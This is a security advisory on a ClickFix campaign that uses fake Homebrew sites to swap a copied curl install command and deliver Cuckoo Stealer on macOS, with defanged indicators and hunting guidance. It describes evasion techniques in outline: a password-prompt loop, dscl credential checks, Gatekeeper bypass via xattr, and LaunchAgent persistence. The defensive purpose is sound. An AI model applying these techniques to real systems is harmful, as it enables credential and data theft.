Summary:
A sophisticated macOS-focused threat campaign is actively targeting developers and system administrators through a deceptive execution technique, ClickFix. Threat actors are leveraging highly convincing typosquatted domains impersonating the popular macOS package manager, Homebrew. By utilizing a "Copy to clipboard" function on the fake Homebrew sites, attackers replace the legitimate installation URL with a malicious one, tricking victims into executing it in their Terminal. The infection chain delivers a two-stage payload consisting of a credential-harvesting script and a full-featured macOS infostealer and Remote Access Trojan (RAT) dubbed Cuckoo Stealer. This threat represents a significant risk to organizational environments due to its capability to silently siphon high-value data, including macOS Keychains, Chromium browser data, Discord and Telegram session tokens, secure notes, VPN configurations, and cryptocurrency wallets, while actively evading detection and bypassing Gatekeeper warnings.

Security Officer Comments:
The attack is initiated when a user lands on a typosquatted domain that perfectly replicates the visual design and multi-language support of the legitimate brew[.]sh website. When the user clicks the "Copy" button to grab the installation command, JavaScript silently modifies the clipboard content. Instead of fetching the script from the legitimate raw.githubusercontent[.]com, the command points to an attacker-controlled subdomain (raw.homabrews[.]org). Because developers are conditioned to copy-paste standard curl -fsSL installation commands, the subtle domain swap often goes unnoticed. Upon pasting the command into the Terminal, a first-stage credential-harvesting shell script executes. The attackers inject malicious code directly into an authentic Homebrew script to maintain a veil of legitimacy. To execute its credential harvesting phase, the malware employs a relentless while loop, exploiting "prompt fatigue" by repeatedly surfacing a fake authentication dialogue until the user finally submits a valid password. To validate passwords under the radar, the script utilizes the macOS Directory Services command-line tool (dscl). By issuing the authonly command, it successfully checks credentials without creating a session or triggering authentication logs. Once valid credentials are confirmed, the script downloads a secondary binary (brew_agent) to the /tmp directory, passing the stolen password as a Base64-encoded argument for immediate privilege use.

The second-stage payload, Cuckoo Stealer, is a robust infostealer and RAT. Upon execution, the malware generates a unique session ID and strips the macOS quarantine extended attribute using the xattr command. This critical evasion technique bypasses Apple's Gatekeeper, preventing security warnings upon subsequent executions. The malware extracts the first five characters of the LANG environment variable to block execution in Commonwealth of Independent States (CIS) countries. Cuckoo Stealer establishes user-level persistence via macOS LaunchAgents. It masquerades as a Homebrew component by creating com.homebrew.brewupdater.plist and dropping its binary as BrewUpdater in a hidden directory. The malware utilizes encrypted HTTPS transport via libcurl.

Suggested Corrections:
IOCs: https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos#Indicators_of_Compromise

• Immediately block access to 5.255.123[.]244 and all associated typosquat/ClickFix domains at the firewall and DNS levels.
• Query EDR/SIEM telemetry for curl commands executing via bash that include the fsSL flag combined with unusual or unauthorized domains.
• Scan macOS environments for the presence of com.homebrew.brewupdater.plist in user LaunchAgent directories, and look for hidden folders matching the .local-* naming convention containing the BrewUpdater binary.
• Implement alerting for dscl authonly usage (indicative of password checking loops) and the xattr -c or xattr -d commands being used to strip com.apple.quarantine attributes from downloaded binaries.
• Hunt for automated AppleScript executions targeting sensitive directories like ~/Library/Keychains or ~/Library/Group Containers/group.com.apple.notes/.

General Best Practices:

• Mandate that developers and system administrators paste copied terminal commands into a plain text editor for visual inspection before executing them in the terminal.
• Educate technical staff on the mechanics of ClickFix attacks, emphasizing that search engine poisoning and typosquatting target technical workflows.
• Ensure multi-factor authentication and strict session lifetimes are enforced across VPNs and organizational SSO to mitigate the impact of stolen session tokens and credentials.
• Restrict the execution of unverified scripts and consider implementing centralized, IT-managed software deployment mechanisms to replace ad-hoc curl | bash developer installations.

Link(s):
https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos